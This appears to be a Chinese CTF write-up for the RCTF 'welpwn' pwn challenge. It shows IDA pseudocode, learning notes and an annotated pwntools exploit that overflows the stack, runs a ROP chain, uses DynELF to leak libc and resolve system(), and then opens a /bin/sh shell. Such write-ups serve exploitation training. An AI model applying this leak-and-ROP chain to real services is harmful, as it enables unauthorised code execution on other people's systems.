伪源码
{
// IDA pseudocode as pasted by the author. The function signature was not
// included on the page, so its name and return type are unknown here.
// IDA declares a single char, but the frame annotation puts buf at
// [bp-400h]: 0x400 bytes lie between buf and the saved frame pointer.
char buf; // [sp+0h] [bp-400h]@1
// 10-second SIGALRM watchdog.
alarm(0xAu);
// 16-byte banner written straight to fd 1.
write(1, "Welcome to RCTF\n", 0x10uLL);
// NOTE(review): IDA shows the argument as _bss_start; presumably this is
// the stdout FILE* -- confirm in the disassembly.
fflush(_bss_start);
// Reads exactly 0x400 bytes, which by the frame annotation is the size of
// the space below the saved frame pointer, so this read alone does not
// overrun the frame.
read(0, &buf, 0x400uLL);
// echo's body is not on this page. The author's note says the overflow was
// not located in this function, and the exploit's 24-byte filler suggests
// the vulnerable buffer lives inside echo -- not verifiable from here.
echo(&buf, &buf);
return 0;
}
学过DynELF
就再也不怕出题人什么都不给了!
仔细分析
1. 64 位程序的参数通过寄存器传递,不能直接放在栈上
2. gadget 片段应该怎么选取
3. 在 IDA 中好像没看出来哪里存在溢出(自己没有进入 echo 函数查看)
4.echo:http://www.zsythink.net/archives/96/
EXP(后期补写脚本历程)
#!/usr/bin/python
#coding:utf-8
from pwn import*
# Target process and its ELF; the script expects the binary in the current directory.
p = process('./welpwn')
elf = ELF("welpwn")
# GOT/PLT entries resolved from the binary. Only the two GOT addresses are
# used further down; write_addr and read_addr are never referenced.
write_got_addr = elf.got['write']
write_addr = elf.plt['write']
read_addr = elf.plt['read']
read_got_addr = elf.got['read']
# Fixed addresses taken from this challenge binary. They are specific to
# welpwn and assume it is loaded at a fixed (non-PIE) base -- not confirmed here.
start_addr = 0x400630          # placed at the end of each leak chain; presumably restarts the program
pop_gadget1 = 0x40089a         # followed on the stack by six qwords (the author labels the first two rbx/rbp)
mov_gadget2 = 0x400880         # follows the six qwords; presumably performs the call set up above -- check the disassembly
pop4_addr = 0x40089c           # first return address, written at offset 24
where_bin_sh_addr = 0x6010d0   # writable location that later receives the "/bin/sh\x00" string
pop1_addr = 0x4008a3           # by its name a single-pop gadget; followed by where_bin_sh_addr then system_addr
def leak(addr):
    """Leak memory at ``addr`` for DynELF by replaying the overflow with a ROP chain.

    Builds a 1024-byte payload: 24 bytes of filler up to the first return
    address, a chain that (per the author's comments) sets rbx=0 and rbp=1
    and, judging by the values write_got_addr / 8 / addr / 1, arranges a
    write of 8 bytes from ``addr`` to fd 1, then ``start_addr`` so the
    program comes back for the next leak. Returns the raw data received
    (up to 4 bytes; may be empty on timeout).

    NOTE(review): Python 2 only -- the str/p64 concatenation and
    ``.encode('hex')`` do not work on Python 3.
    """
    # Drain the banner or any pending output before sending.
    p.recv(timeout = 0.1)
    # Filler up to the first return address. The 24-byte offset is the
    # author's finding; it cannot be derived from the pseudocode on this page.
    payload = 'A'*24
    payload += p64(pop4_addr)
    payload += p64(pop_gadget1)
    payload += p64(0) #rbx
    payload += p64(1) #rbp
    payload += p64(write_got_addr)
    payload += p64(8)
    payload += p64(addr)
    payload += p64(1)
    payload += p64(mov_gadget2)
    # The author's open question ("#?"): 56 bytes = 7 qwords consumed between
    # mov_gadget2 and start_addr -- check what mov_gadget2 pops or adjusts
    # before it returns.
    payload += "A"*56 #?
    payload += p64(start_addr)
    # Pad to exactly the 0x400 bytes the program reads.
    payload = payload.ljust(1024,"B")
    # send, not sendline: the payload is already exactly 1024 bytes, so no
    # trailing newline may be appended (the author's "!!!").
    p.send(payload) #!!!
    # Take up to 4 bytes of the leaked data, then discard whatever else
    # arrives before the next call.
    content = p.recv(4)
    p.recv(timeout = 0.1)
    # `content or ''` guards an empty result so the hex dump never fails.
    print ("%#x -> %s"%(addr,(content or '').encode('hex')))
    return content
#gdb.attach(p)
# Resolve system() in libc through the leak primitive alone; no libc file is needed.
d = DynELF(leak, elf = elf)
system_addr = d.lookup("system","libc")
log.info("system_addr = %#x",system_addr)
# Final chain, same shape as in leak(): the six qwords now name read_got_addr,
# 8 and where_bin_sh_addr (with 0 in the slot that held 1 before), so the
# call presumably reads 8 bytes into where_bin_sh_addr; afterwards control
# goes to pop1_addr / where_bin_sh_addr / system_addr.
payload = "A"*24
payload += p64(pop4_addr)
payload += p64(pop_gadget1)
payload += p64(0)
payload += p64(1)
payload += p64(read_got_addr)
payload += p64(8)
payload += p64(where_bin_sh_addr)
payload += p64(0)
payload += p64(mov_gadget2)
payload += "A"*56
payload += p64(pop1_addr)
payload += p64(where_bin_sh_addr)
payload += p64(system_addr)
payload = payload.ljust(1024,"b")
# NOTE(review): unlike leak() this uses sendline, so one extra byte ("\n")
# is queued ahead of the "/bin/sh\x00" sent next; check that the 8-byte
# read at where_bin_sh_addr receives what you intend.
p.sendline(payload)
# Exactly 8 bytes, matching the size the chain reads.
p.send("/bin/sh\x00")
p.interactive()